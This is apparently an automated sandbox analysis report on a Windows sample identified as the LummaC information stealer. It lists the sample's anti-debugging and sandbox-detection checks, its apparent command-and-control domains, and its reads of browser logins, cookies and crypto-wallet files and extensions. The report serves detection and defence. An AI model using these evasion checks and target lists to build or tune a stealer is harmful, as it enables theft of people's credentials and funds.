Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: z3IxCpcpg4.exe, 00000000.00000003.2235275146.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: z3IxCpcpg4.exe, 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmp, z3IxCpcpg4.exe, 00000000.00000002.2571311166.0000000005E72000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: NTICE
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: SICE
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

Code function: 0_2_05E85DAA rdtsc

0_2_05E85DAA

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

Code function: 0_2_00F3E110 LdrInitializeThunk,

0_2_00F3E110

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: z3IxCpcpg4.exe	String found in binary or memory: bashfulacid.lat
Source: z3IxCpcpg4.exe	String found in binary or memory: curverpluch.lat
Source: z3IxCpcpg4.exe	String found in binary or memory: tentabatte.lat
Source: z3IxCpcpg4.exe	String found in binary or memory: shapestickyr.lat
Source: z3IxCpcpg4.exe	String found in binary or memory: talkynicer.lat
Source: z3IxCpcpg4.exe	String found in binary or memory: slipperyloo.lat
Source: z3IxCpcpg4.exe	String found in binary or memory: manyrestro.lat
Source: z3IxCpcpg4.exe	String found in binary or memory: observerfry.lat
Source: z3IxCpcpg4.exe	String found in binary or memory: wordyfindy.lat

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior

Source: z3IxCpcpg4.exe, 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: eProgram Manager
Source: z3IxCpcpg4.exe, z3IxCpcpg4.exe, 00000000.00000002.2571311166.0000000005E72000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: (aProgram Manager

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: z3IxCpcpg4.exe, 00000000.00000003.2323960417.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2397251222.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2338697078.0000000000939000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2478557246.0000000000915000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2318341211.0000000000939000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: z3IxCpcpg4.exe PID: 4296, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: z3IxCpcpg4.exe, 00000000.00000003.2293346349.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: z3IxCpcpg4.exe, 00000000.00000003.2293346349.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: z3IxCpcpg4.exe, 00000000.00000003.2260445967.0000000005167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty2PC
Source: z3IxCpcpg4.exe, 00000000.00000003.2293346349.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: z3IxCpcpg4.exe, 00000000.00000003.2293346349.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: z3IxCpcpg4.exe, 00000000.00000003.2293331074.0000000000924000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: z3IxCpcpg4.exe, 00000000.00000003.2293346349.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: z3IxCpcpg4.exe, 00000000.00000003.2293346349.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: z3IxCpcpg4.exe, 00000000.00000003.2293217595.0000000000927000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
